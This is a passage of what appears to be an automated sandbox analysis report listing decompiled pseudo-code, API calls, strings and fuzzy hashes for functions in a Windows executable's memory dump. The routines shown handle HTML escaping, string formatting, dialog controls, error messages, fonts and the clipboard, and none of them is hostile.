#A, xrefs: 00401FCB
#A, xrefs: 004020F0
@#A, xrefs: 00401F68

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscmp
String ID: #A$ #A$ #A$@#A$@#A
API String ID: 243296809-3329557610
Opcode ID: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
Opcode Fuzzy Hash: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBDA, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040DBDA(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040dbdf
0x0040dbe1
0x0040dbe3
0x0040dbe4
0x0040dbe4
0x0040dbeb
0x00000000
0x00000000
0x0040dbed
0x0040dbee
0x0040dc56
0x0040dc57
0x0040dc5c
0x0040dc5f
0x0040dc68
0x0040dc6c
0x0040dc6f
0x00000000
0x0040dc6f
0x0040dc78
0x0040dbf5
0x0040dbf9
0x0040dc07
0x0040dc24
0x0040dc33
0x0040dc4e
0x0040dc63
0x0040dc67
0x0040dc50
0x0040dc50
0x0040dc51
0x00000000
0x0040dc51
0x0040dc35
0x0040dc35
0x0040dc37
0x00000000
0x0040dc37
0x0040dc26
0x0040dc26
0x0040dc28
0x0040dc3c
0x0040dc3d
0x0040dc42
0x0040dc45
0x0040dc45
0x0040dc09
0x0040dc11
0x0040dc16
0x0040dc19
0x0040dc19
0x0040dbfb
0x0040dbfb
0x0040dbfc
0x00000000
0x0040dbfc
0x00000000
0x0040dbf9

APIs

memcpy.MSVCRT ref: 0040DC11
memcpy.MSVCRT ref: 0040DC3D
memcpy.MSVCRT ref: 0040DC57

Strings

°, xrefs: 0040DC28
&, xrefs: 0040DC37
<, xrefs: 0040DBEE
>, xrefs: 0040DBFC
", xrefs: 0040DC0B
<br>, xrefs: 0040DC51

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F

Uniqueness

Uniqueness Score: -1.00%

Function 00406050, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406050(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t52);
					_push( *((intOrPtr*)(_t52 - 4)));
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040DFD6();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

0x0040605b
0x0040606a
0x00406071
0x00406079
0x0040607c
0x0040607f
0x00406082
0x00406089
0x00406089
0x00406091
0x00406094
0x00406099
0x0040609e
0x0040609f
0x004060ab
0x004060b0
0x004060c3
0x004060cd
0x004060d1
0x004060d6
0x004060e4
0x004060ec
0x004060ef
0x004060f2
0x004060f2
0x004060f5
0x004060f5
0x004060fb
0x004060fe
0x00406102
0x0040610c

APIs

memset.MSVCRT ref: 00406071
_snwprintf.MSVCRT ref: 0040609F
wcslen.MSVCRT ref: 004060AB
memcpy.MSVCRT ref: 004060C3
wcslen.MSVCRT ref: 004060D1
memcpy.MSVCRT ref: 004060E4

Strings

%s (%s), xrefs: 00406094

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
Instruction ID: f719391f3769af673f645ccb22e5d53aea3ed69308020c87343d88254f0aea6b
Opcode Fuzzy Hash: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
Instruction Fuzzy Hash: 27119072800119EBCF20DF95CC45ECAB7F9FF00308F1144BAE944B7152EBB5A6588B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406F88, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040E340(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040E03E();
					if(_t26 != 0) {
						E00406E5E(_t34,  &_v8712);
					}
				}
				return 1;
			}

0x00406f90
0x00406fa6
0x00406fad
0x00406fb8
0x00406fbe
0x00406fcf
0x00406fd7
0x00406fef
0x00406ff6
0x0040700d
0x00407013
0x00407019
0x0040701e
0x0040701f
0x00407028
0x00407032
0x00407038
0x00407028
0x0040703f

APIs

memset.MSVCRT ref: 00406FAD
GetDlgCtrlID.USER32 ref: 00406FB8
GetWindowTextW.USER32 ref: 00406FCF
memset.MSVCRT ref: 00406FF6
GetClassNameW.USER32 ref: 0040700D
_wcsicmp.MSVCRT ref: 0040701F

Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F

Strings

sysdatetimepick32, xrefs: 00407019

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
Instruction ID: 57a1b33134393eb8e1d887e85ad6c32cde466d51f9494c9a374c65f7fd7f5279
Opcode Fuzzy Hash: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
Instruction Fuzzy Hash: 0C11A7329042197ADB24EF91DD49A9B7B7CEF04750F0040BAF508E2091E7755A55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004052B3, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004052B3(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40f454);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x004052b3
0x004052c1
0x004052c9
0x004052ce
0x004052d8
0x004052e0
0x004052e2
0x004052e2
0x004052e0
0x004052fe
0x0040532d
0x00405300
0x0040530b
0x00405313
0x00405319
0x0040531d
0x0040531d
0x00405337

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
wcslen.MSVCRT ref: 00405303
wcscpy.MSVCRT ref: 00405313
LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
wcscpy.MSVCRT ref: 0040532D

Strings

netmsg.dll, xrefs: 004052D3

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040103E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040103E(void* __esi, void* __eflags) {
				signed int _v8;
				struct tagLOGFONTW _v100;
				signed int _t14;
				int _t21;
				long _t22;
				signed int _t25;
				struct HDC__* _t27;
				intOrPtr _t33;

				_t27 = GetDC(0);
				_t14 = GetDeviceCaps(_t27, 0x5a);
				_t25 = 0x60;
				asm("cdq");
				_v8 = _t14 * 0xe / _t25;
				ReleaseDC(0, _t27);
				E00405833( &_v100, L"MS Sans Serif", _v8, 1);
				_t21 = CreateFontIndirectW( &_v100);
				 *(__esi + 0x43c) = _t21;
				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
				_t33 =  *0x412fd0; // 0x0
				if(_t33 != 0) {
					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
				}
				return _t22;
			}

0x0040104f
0x00401054
0x0040105f
0x00401060
0x00401065
0x00401068
0x0040107b
0x00401087
0x0040109f
0x004010a5
0x004010a7
0x004010ae
0x00000000
0x004010c1
0x004010c6

APIs

GetDC.USER32(00000000), ref: 00401049
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
ReleaseDC.USER32 ref: 00401068

Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D

CreateFontIndirectW.GDI32(?), ref: 00401087
SendDlgItemMessageW.USER32 ref: 004010A5
SendDlgItemMessageW.USER32 ref: 004010C1

Strings

MS Sans Serif, xrefs: 00401076

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
String ID: MS Sans Serif
API String ID: 1274520933-168460110
Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68

Uniqueness

Uniqueness Score: -1.00%

Function 00403333, Relevance: 12.2, APIs: 8, Instructions: 199
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				void* _t75;
				signed int _t77;
				signed int _t91;
				signed int _t92;
				void* _t100;
				void* _t104;
				short* _t122;
				unsigned int _t128;
				intOrPtr _t131;
				signed int _t134;
				void* _t149;
				void* _t150;
				intOrPtr* _t151;
				short _t157;
				signed int _t158;

				_t132 = __ecx;
				_t75 = _a4 - 0x4e;
				_t158 = __ecx;
				if(_t75 == 0) {
					_t151 = _a12;
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {
							goto L27;
						}
						_t77 =  *(_t151 + 0x14);
						__eflags = _t77 & 0x00000002;
						if((_t77 & 0x00000002) == 0) {
							L36:
							_t134 =  *(_t151 + 0x18) ^ _t77;
							__eflags = 0x0000f000 & _t134;
							if((0x0000f000 & _t134) == 0) {
								L39:
								__eflags =  *(_t151 + 0x14) & 0x00000002;
								if(( *(_t151 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0x18) & 0x00000002;
								if(( *(_t151 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0xc);
								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t158 + 0x48)) = 1;
								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t158 + 0x48)) = 0;
								return 1;
							}
							L37:
							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
							__eflags = _t91 & 0x00000002;
							if((_t91 & 0x00000002) != 0) {
								_t92 = _t91 & 0x0000f000;
								__eflags = _t92 - 0x1000;
								_a8 = _t92;
								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
								_a8 - 0x2000 = _a8 == 0x2000;
								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t151 + 0x18) & 0x00000002;
						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t100 = _t75 - 0xc2;
				if(_t100 == 0) {
					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
					E004031BE(_t158);
					E00405B17(_t149,  *(_t158 + 0x10), 0);
					goto L27;
				}
				_t104 = _t100 - 1;
				if(_t104 != 0) {
					goto L27;
				}
				_t128 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
					L7:
					if(_t128 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ec) {
							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ee) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t158 + 0x10), 2);
						}
						if(_a8 == 1) {
							E0040314A(_t158);
							EndDialog( *(_t158 + 0x10), 1);
						}
						return 1;
					}
					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
					_t132 = 0;
					if(_t131 <= 0) {
						L12:
						E004031BE(_t158);
						goto L13;
					}
					_t150 = 0;
					do {
						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
						 *(_t122 + 2) = _t132;
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
						_t132 = _t132 + 1;
						_t150 = _t150 + 0x14;
						 *_t122 = _t157;
					} while (_t132 < _t131);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004030F2(__ecx, __ecx);
						goto L7;
					}
				}
			}

0x00403333
0x00403339
0x0040333f
0x00403341
0x00403481
0x00403484
0x0040348d
0x0040348f
0x00403492
0x00403499
0x0040349f
0x00403492
0x004034a0
0x004034a4
0x00403478
0x00403478
0x00000000
0x004034a6
0x004034a6
0x004034a9
0x00000000
0x00000000
0x004034ab
0x004034ae
0x004034b5
0x004034bd
0x004034c0
0x004034c2
0x004034c4
0x00403511
0x00403511
0x00403515
0x00000000
0x00000000
0x0040351b
0x0040351f
0x00000000
0x00000000
0x00403529
0x00403537
0x00403545
0x00403553
0x00403571
0x00403574
0x0040357a
0x00000000
0x0040357d
0x004034c6
0x004034d0
0x004034d8
0x004034da
0x004034dc
0x004034e0
0x004034e8
0x004034f3
0x00403501
0x0040350c
0x0040350c
0x00000000
0x004034da
0x004034b7
0x004034bb
0x00000000
0x00000000
0x00000000
0x004034bb
0x004034a4
0x00403347
0x0040334c
0x00403460
0x00403467
0x00403471
0x00000000
0x00403477
0x00403352
0x00403353
0x00000000
0x00000000
0x0040335c
0x00403362
0x0040337c
0x0040337f
0x00000000
0x00000000
0x0040338b
0x004033c0
0x004033d1
0x004033d9
0x004033d9
0x004033e4
0x004033ec
0x004033ec
0x004033f7
0x00403402
0x00403408
0x0040340f
0x0040341a
0x00403420
0x0040342c
0x00403433
0x00403433
0x0040343a
0x0040343e
0x00403448
0x00403448
0x00000000
0x0040344c
0x00403390
0x00403393
0x00403397
0x004033ba
0x004033bb
0x00000000
0x004033bb
0x00403399
0x0040339b
0x004033a0
0x004033a3
0x004033aa
0x004033af
0x004033b0
0x004033b5
0x004033b5
0x00000000
0x0040336b
0x00403371
0x00000000
0x00403377
0x00403377
0x00000000
0x00403377
0x00403371

APIs

GetDlgItem.USER32 ref: 004033D7
GetDlgItem.USER32 ref: 004033EA
GetDlgItem.USER32 ref: 004033FF
GetDlgItem.USER32 ref: 00403417
EndDialog.USER32(?,00000002), ref: 00403433
EndDialog.USER32(?,00000001), ref: 00403448

Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114

SendDlgItemMessageW.USER32 ref: 00403460
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403584, Relevance: 12.1, APIs: 8, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t74;
				signed int _t76;
				void* _t78;
				void** _t80;
				signed int _t84;
				void* _t88;
				signed int _t89;

				_t78 = __edi;
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x44)) = __eax;
				L0040E038();
				if(__eax == 0) {
					_t80 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t80 = __eax;
				}
				 *(_t78 + 0x40) = _t80;
				_t39 =  *_t80;
				_t88 = _t39;
				if(_t88 != 0) {
					_push(_t39);
					L0040E032();
					 *_t80 = 0;
				}
				_t80[2] = _a8;
				_t41 = E0040299A(_a8);
				_t74 = 4;
				_t80[1] = _t41;
				_t42 = _t41 * _t74;
				_push( ~(0 | _t88 > 0x00000000) | _t42);
				L0040E038();
				 *_t80 = _t42;
				memset(_t42, 0, _t80[1] << 2);
				E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
				_t89 =  *(_t78 + 0x44);
				if(_t89 == 0) {
					_t84 = ( *(_t78 + 0x40))[1];
					_t76 = 0x14;
					_t53 = _t84 * _t76;
					_push( ~(0 | _t89 > 0x00000000) | _t53);
					L0040E038();
					 *(_t78 + 0x44) = _t53;
					if(_t84 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
					}
					_v8 = 1;
				}
				if(E0040152F(0x448, _t78, _a4) == 1) {
					E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
					InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t78 + 0x44));
					L0040E032();
					return _t47;
				}
				return _t47;
			}

0x00403584
0x0040358c
0x0040358e
0x00403591
0x00403594
0x0040359c
0x004035a4
0x0040359e
0x0040359e
0x004035a0
0x004035a0
0x004035a6
0x004035a9
0x004035ab
0x004035ad
0x004035af
0x004035b0
0x004035b6
0x004035b6
0x004035bc
0x004035bf
0x004035c8
0x004035c9
0x004035cc
0x004035d5
0x004035d6
0x004035e4
0x004035e6
0x004035f4
0x004035f9
0x004035fc
0x00403601
0x00403608
0x0040360b
0x00403614
0x00403615
0x0040361d
0x00403620
0x00403622
0x00403624
0x00403627
0x0040362f
0x00403632
0x00403632
0x00403624
0x00403635
0x00403635
0x0040364d
0x00403655
0x00403662
0x00403662
0x0040366b
0x00403676
0x00403678
0x0040367b
0x00000000
0x00403680
0x00403682

APIs

??2@YAPAXI@Z.MSVCRT ref: 00403594
??3@YAXPAX@Z.MSVCRT ref: 004035B0
??2@YAPAXI@Z.MSVCRT ref: 004035D6
memset.MSVCRT ref: 004035E6
??2@YAPAXI@Z.MSVCRT ref: 00403615
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00403662
SetFocus.USER32(?,?,?,?), ref: 0040366B
??3@YAXPAX@Z.MSVCRT ref: 0040367B

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
Instruction ID: 3294c0e99436dff93e0626edbac004f6b09504e7bc31cfe1dcbb88acf09cb1a4
Opcode Fuzzy Hash: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
Instruction Fuzzy Hash: 3A3190B2501611BFDB249F69C94592ABBA8FF04354B04893EF605E76E0C77AEC108B54

Uniqueness

Uniqueness Score: -1.00%

Function 004054F1, Relevance: 12.0, APIs: 8, Instructions: 42
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004054F1(void* _a4) {
				int _t7;
				signed int _t12;
				int _t14;
				void* _t18;
				signed int _t20;
				void* _t23;

				_t23 = _a4;
				_t20 = 0;
				EmptyClipboard();
				if(_t23 != 0) {
					_t7 = wcslen(_t23);
					_t3 = _t7 + 2; // 0x2
					_t14 = _t7 + _t3;
					_t18 = GlobalAlloc(0x2000, _t14);
					if(_t18 != 0) {
						memcpy(GlobalLock(_t18), _t23, _t14);
						GlobalUnlock(_t18);
						_t12 = SetClipboardData(0xd, _t18);
						asm("sbb esi, esi");
						_t20 =  ~( ~_t12);
					}
				}
				CloseClipboard();
				return _t20;
			}

0x004054f2
0x004054f7
0x004054f9
0x00405501
0x00405506
0x0040550c
0x0040550c
0x0040551c
